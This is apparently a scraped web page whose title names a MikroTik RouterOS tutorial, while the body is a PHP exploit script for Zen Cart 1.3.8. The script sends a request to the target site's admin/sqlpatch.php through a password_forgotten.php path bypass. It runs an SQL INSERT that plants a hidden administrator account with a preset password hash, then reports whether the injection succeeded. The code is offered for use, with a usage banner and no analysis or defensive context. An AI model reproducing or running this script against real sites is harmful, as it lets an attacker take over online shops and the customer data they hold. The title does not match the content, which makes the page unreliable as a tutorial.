Routeros Mikrotik Tutorial - Zen Cart SQL Execution Exploit php

http://noscan.xp3.biz/zen.txt

#!/usr/bin/php

if($argc < 2)
{
echo "
==============================================
Zen Cart 1.3.8 Remote SQL Execution Exploit
==============================================


root@irvian ,# php zen.php http://target.com
==============================================
";exit(1);
}

function gets($url,$post=null) {
$hajar = curl_init();
curl_setopt($hajar,CURLOPT_URL, $url);
curl_setopt($hajar, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($hajar, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($hajar, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);

curl_setopt ($hajar, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($hajar, CURLOPT_TIMEOUT, 0);

if($post != null)
{
curl_setopt ($hajar, CURLOPT_POST, true);
curl_setopt ($hajar, CURLOPT_POSTFIELDS,$post);
}

$result = curl_exec($hajar);
curl_close($hajar);
return $result;
}

$url = $argv[1];

$sql = "INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (56, 'adminsys', 'admin@irvian.info', '617ec22fbb8f201c366e9848c0eb6925:87');
";
$enc = urlencode($sql);
$form = $url."/admin/sqlpatch.php/password_forgotten.php?action=execute";

$req = gets($form,"query_string=$enc");

if(preg_match("/1 statements processed/i", $req)){
echo "\n[!]Done";
}
else{
echo "\n[!]failed";}

Comments